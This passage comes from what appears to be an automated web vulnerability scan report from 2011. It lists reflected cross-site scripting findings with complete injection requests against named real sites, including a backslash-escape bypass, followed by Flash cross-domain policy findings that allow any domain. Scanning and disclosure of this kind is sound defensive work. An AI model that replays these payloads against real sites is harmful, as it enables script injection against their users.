Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/forums/external.phpe2cef<script>alert(1)</script>253b7e5f1c8</span>
...[SNIP]...

3.26. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /viewers/scroller_x.swf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c54e<script>alert(1)</script>0e0f6e0a5f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewers9c54e<script>alert(1)</script>0e0f6e0a5f2/scroller_x.swf HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:13:46 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/viewers9c54e<script>alert(1)</script>0e0f6e0a5f2/scroller_x.swf</span>
...[SNIP]...

3.27. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /viewers/scroller_x.swf

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9721a<script>alert(1)</script>37549e4044d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewers/scroller_x.swf9721a<script>alert(1)</script>37549e4044d HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:13:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/viewers/scroller_x.swf9721a<script>alert(1)</script>37549e4044d</span>
...[SNIP]...

3.28. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do [userStageModel.emailAddr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/user_reg_pre_mail.do

Issue detail

The value of the userStageModel.emailAddr request parameter is copied into the HTML document as plain text between tags. The payload 24c54<script>alert(1)</script>508ccbd11b05bf3ba was submitted in the userStageModel.emailAddr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nas/security/user_reg_pre_mail.do;nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596?method=subscribeMailUser&nnsStateListHidden=AK&userStageModel.emailAddr=24c54<script>alert(1)</script>508ccbd11b05bf3ba HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/user_reg_mail.do?method=createNewMode
Cache-Control: max-age=0
Origin: https://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13476


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<li>24c54<script>alert(1)</script>508ccbd11b05bf3ba is an invalid e-mail address.</li>
...[SNIP]...

3.29. http://www.redskye911.com/e911_information_center/default.aspx [_TSM_HiddenField_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redskye911.com
Path:   /e911_information_center/default.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a54f5\'%3balert(1)//7b4e3c0ecf3 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as a54f5\\';alert(1)//7b4e3c0ecf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /e911_information_center/default.aspx?_TSM_HiddenField_=ctl00_pageWebinarInfoForm_ctl00_HiddenFielda54f5\'%3balert(1)//7b4e3c0ecf3&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d3.0.31106.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3a79be4cda-496c-4ec3-9619-b4d32086b3b9%3ade1feab2%3af9cec9bc%3a35576c48 HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.2.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:09:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Fri, 11 May 2012 01:09:32 GMT
Last-Modified: Thu, 20 Jan 2011 20:17:09 GMT
Content-Type: application/x-javascript
Content-Length: 47738

//START Common.Common.js
(function(){var scriptName="ExtendedCommon";function execute(){var u="WatermarkChanged",t="HTML",s="BODY",r="hiddenInputToUpdateATBuffer_CommonToolkitScripts",q="HTMLEvents",
...[SNIP]...
)();
//END TextboxWatermark.TextboxWatermark.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_pageWebinarInfoForm_ctl00_HiddenFielda54f5\\';alert(1)//7b4e3c0ecf3').value += ';;AjaxControlToolkit, Version=3.0.31106.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:79be4cda-496c-4ec3-9619-b4d32086b3b9:de1feab2:f9cec9bc:35576c48';Sys.Application.remove_lo
...[SNIP]...

3.30. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://connectedplanetonline.com
Path:   /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d3cb"-alert(1)-"6b2f9ae4ade was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ HTTP/1.1
Host: connectedplanetonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=8d3cb"-alert(1)-"6b2f9ae4ade

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:02 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Content-Type: text/html
Content-Length: 53341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s-0422/index.html" //doc uri
s.prop9="By Joan Engebretson" // byline
s.prop10="Apr 22, 2011 12:42 PM"
status="200"
if (status == "404")
{
s.referrer="http://www.google.com/search?hl=en&q=8d3cb"-alert(1)-"6b2f9ae4ade"
s.pageType="errorPage"
    s.pageName=location.href

}
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.31. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 8c930<script>alert(1)</script>3871f157ceb was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==8c930<script>alert(1)</script>3871f157ceb

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 01:07:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==8c930<script>alert(1)</script>3871f157ceb
userid:
</div>
...[SNIP]...

4. Flash cross-domain policy
There are 30 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 00:47:35 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 12 May 2011 00:47:55 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.3. http://api.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 11 Jun 2011 00:48:12 GMT
X-FB-Server: 10.42.55.43
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 01:07:20 GMT
Date: Thu, 12 May 2011 01:07:20 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://by.optimost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 00:50:36 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 00:50:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.6. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 11 May 2011 02:38:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 79921
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.7. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:00 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.8. http://metrics.connectedplanetonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:47 GMT
Server: Omniture DC/2.0.0
xserver: www80
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.9. http://metrics.sprint.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:32 GMT
Server: Omniture DC/2.0.0
xserver: www62
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.10. http://metrics.vonage.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
xserver: www27
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Thu, 12 May 2011 00:46:53 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.12. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 00:48:44 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.13. http://api.demandbase.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.demandbase.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.demandbase.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 May 2011 00:46:49 GMT
ETag: "248c48f-113-4a13e63e774c0"
Last-Modified: Tue, 19 Apr 2011 05:00:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 275
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*.demandbase.com" to-ports="80,443" secure="false" />
<allow-access-from domain="*.fireraven.com" to-ports="80,443" secure="false" />
<site-contr
...[SNIP]...

4.14. http://api.tweetmeme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 12 May 2011 00:48:11 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Thu, 12 May 2011 00:48:56 +0000 GMT
Etag: ffad005467e43bdd2b8b4291a00ba33b
X-Served-By: h01

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

4.15. http://cdn.stumble-upon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:32 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 00:48:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

4.16. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

